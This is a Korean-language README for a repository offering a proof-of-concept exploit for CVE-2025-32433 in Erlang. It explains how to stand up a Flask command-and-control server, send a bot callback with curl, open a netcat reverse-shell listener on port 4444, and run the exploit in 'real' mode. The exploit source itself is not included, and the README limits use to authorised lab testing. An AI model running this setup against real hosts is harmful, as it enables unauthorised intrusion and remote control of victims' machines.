
CVE-2025-32433에 대한 개념 증명 익스플로잇으로, 시뮬레이션 및 실제 공격 모드를 포함하며, 리버스 셸 콜백 및 사후 공격 시뮬레이션을 위한 Flask 기반 C2 서버가 포함되어 있습니다.
이 저장소는 실제 CVE(CVE-2025-32433)를 시연하는 코드를 포함하고 있습니다.
명시적 승인이 있는 환경에서만 사용하십시오.
소유하거나 관리하지 않는 시스템에 대해 이 익스플로잇을 절대 테스트하지 마십시오.
무단 사용은 불법이며, 비윤리적이며, 사이버보안 커뮤니티에 해롭습니다.
CVE-2025-32433에 대한 시뮬레이션 및 실제 PoC
내 친구 Chocapikk가 이 발견된 poc erling_cve.py를 보여줬는데, 흥미가 생겨 안전한 환경에서 테스트해보고 싶었습니다.
이 저장소에는 두 가지 선택지가 있습니다. 아래에 설명하는 안전한 시뮬레이션 스크립트와 시스템입니다.
또는 실제 erling_cve.py를 사용할 수 있습니다 (윤리적인 방식으로 주의를 기울이고 테스트 권한이 있는 네트워크에서만).
이 도구를 사용하여 실제 익스플로잇을 테스트하거나 실행하기 전에 내 친구 m0usemm0use와 그의 Python 스크립트를 확인하여 CVE-2025-32433의 취약한 대상을 찾으십시오!!!!
https://github.com/m0usem0use/erl_mouse
CVE-2025-32433에 대한 익스플로잇 시뮬레이션 버전
C2 서버 설정
Python Flask 기반 C2 구축: 봇 콜백 또는 리버스 셸에 강력합니다.
C2 서버에서 이 설정 스크립트를 실행하십시오
apt update && apt install python3-pip git -y
sudo apt install python3-flask
mkdir ~/c2
cd ~/c2
nano c2_server.py (paste in c2_server script edit as needed)
run
python3 c2_server.py
봇(또는 테스트 스크립트)은 다음과 같이 curl로 홈에 접속할 수 있습니다
curl -X POST http://:8080/report -d "Bot is online"
Kali에서 Python venv 설정
mkdir ~/ssh-bot-lab && cd ~/ssh-bot-lab
Python 가상 환경 생성
python3 -m venv venv
source venv/bin/activate
sudo apt install python3-requests
콜백 테스트
nano test_callback.py (paste in test_callback script and edit as needed)
콜백 실행
python3 test_callback.py
이제 공식적으로 다음을 갖추게 되었습니다
작동하는 venv
실시간 클라우드 C2
기능적인 콜백 인젝션
-대상/피해자 머신에 Erlang 프로세스 또는 서비스가 노출되어 있어야 합니다 (또는 시뮬레이션).
Eerling_cve.py는 무엇을 하나요?
우리가 찾은 Erlang 스타일 PoC를 가져와서
Kali 머신에서
nano poc_erlang_test.py
-paste in poc_erlang_test.py and edit as needed
리스너 열기
새 터미널에서 실행
nc -lvnp 4444
PoC 실행
python poc_erlang_test.py --real